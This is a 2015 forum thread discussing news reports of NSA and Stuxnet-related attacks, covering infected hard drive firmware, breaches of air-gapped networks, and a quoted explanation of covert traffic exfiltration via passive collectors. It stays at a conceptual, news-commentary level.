Air Gap

**DJ Ms. White** · 02-16-15, 07:52 PM

Log In - The New York Times

Eh, the URL didn't play nice. Anywho, the gist is that more details have been revealed on stuff like Stuxnet. Details include hard drives shipped to target countries having infected firmware.

**AetheLove** · 02-16-15, 10:52 PM

[Defcon] Hardware backdooring is practical

thinkst Thoughts...: If the NSA has been hacking everything, how has nobody seen them coming?

Project Zero: (^Exploiting)\s*(CVE-2015-0318)\s*(in)\s*(Flash$)

Æ

**deputyfestus** · 02-17-15, 06:58 AM

Could ya'll pair this down to street level something like "we're screwed if you want to keep anything private get two cans and a string manufactured before 1980".

**DJ Ms. White** · 02-17-15, 09:14 AM

Firmware is something that helps control hardware and that an antivirus can't examine. If it's infected, things get rough.

An air gap is where you have a computer or network of computers that are disconnected from the internet. It was thought to be a good defense mechanism.

This method means that the hard drives shipped for government use to Iran, Russia, etc. from major HDD manufacturers had infected firmware. This allowed for the US (and possibly Israel since they helped with Stuxnet) to infect/control networks of computers thought to be beyond reach. Stuxnet was what damaged the Iranian nuclear program a few years back.

TL

R: You're probably safe as you aren't a government.

**AetheLove** · 02-17-15, 12:36 PM

Originally Posted by deputyfestus

Could ya'll pair this down to street level something like "we're screwed if you want to keep anything private get two cans and a string manufactured before 1980".

The variety of attacks and compromises available is astounding, and many of them exist at very low levels in the architecture.

You should read the word "astounding" in a literal sense. The technical accomplishments amaze even people in the industry.

I didn't read the Air-Gap piece that White (sort of) posted (friggin' NYTimes 'log-in'...), but it seems like the thrust is that spooks have been able to penetrate foreign networks that are not connected to the internet. These networks are "air gapped" - like setting up a LAN of machines with no WiFi in a house with no internet service. One way they do this is by compromising hardware components ahead of time, and arranging to have the hardware installed in the 'secure' network. Once your code is inside someone else's air-gapped network it can cause all sorts of trouble. It might even find a way to get information out over a side-channel.

The Thinkst article is the one I find most revealing. It's not about air gaps, but is a decent metric for how completely fucked we all are. One point from there:

Even if we were completely underprepared as defenders, one would think that those cases where implants were communicating back to the NSA would have been discovered (even if by accident) sooner or later. Once more, the documents reveal why this would not have resulted in the classic "smoking gun”.

A common IR process when an attack has been discovered is to determine where the exfiltrated data is going to. In the most simplistic case (or if big budget movies are involved) this simple step could allow an analyst to say:
“The data from this compromised host is going to HOST_B in country_X. So country_X is the culprit.”

Of course, since even spirited teenagers have been making use of "jump hosts" since the 90's, a variation on this would be not just to base the attribution on the location of HOST_B, but to observe who then accesses HOST_B to "collect the loot". (It's the sort of time you really want to be the "global passive adversary”).

Even this would have tipped the NSA's hand sooner or later, and what we see from the docs is a clever variation on the theme:

We see the use of an entire new protocol, called FASHIONCLEFT to effectively copy traffic off a network, attach metadata to it, then hide the packet within another packet allowed to exfil the targeted network.

Tunnelling one type of traffic over another is not novel (although a 27 page interface control document for the protocol is cool) but this still leaves open the possibility that you would see victim_machine talking to HOST_X in Europe. This is where passive collection comes in..

This is beautiful! So the data is munged into any packet that is likely to make it out of the network, and is then directed past a passive collector. This means that we cant rely on the host the data was sent to for attribution, and even if we did completely own the last hop, to see who shows up to grab the data, we would be watching in vain, because the deed was done when the packets traversed a network 3 hops ago.

This really is an elegant solution and a beautiful sleight of hand. With the NSA controlling tens of thousands of passive hosts scattered around the Internet, good luck ever finding that smoking gun!

That is... to get the data out they stuff it into other packets that are legitimately outbound from the network. Those packets, legitimately sent by someone in their office doing the things they should be doing, then traverse the internet on their way to their legitimate and expected destination. The hidden data is sucked out as it traverses the internet by one (of at least thousands) of the compromised nodes along the way.

The Flash article is another example of how lame and exploitable Flash is - but that shouldn't be news to anyone here.

The DefCon article says that the war has moved down a level. OS exploits are very last-century. You should be at least as worried about your hardware and the code running in it. The implication is that if you got (say) a new motherboard you should absolutely not trust it. If you de-soldered and removed all the components and then re-flashed their firmware with known-secure code, and then reassembled your motherboard - then you're still not completely safe.

It's easy to see why all this inspires so much anger and paranoia.

But it's also pretty amazing.

Æ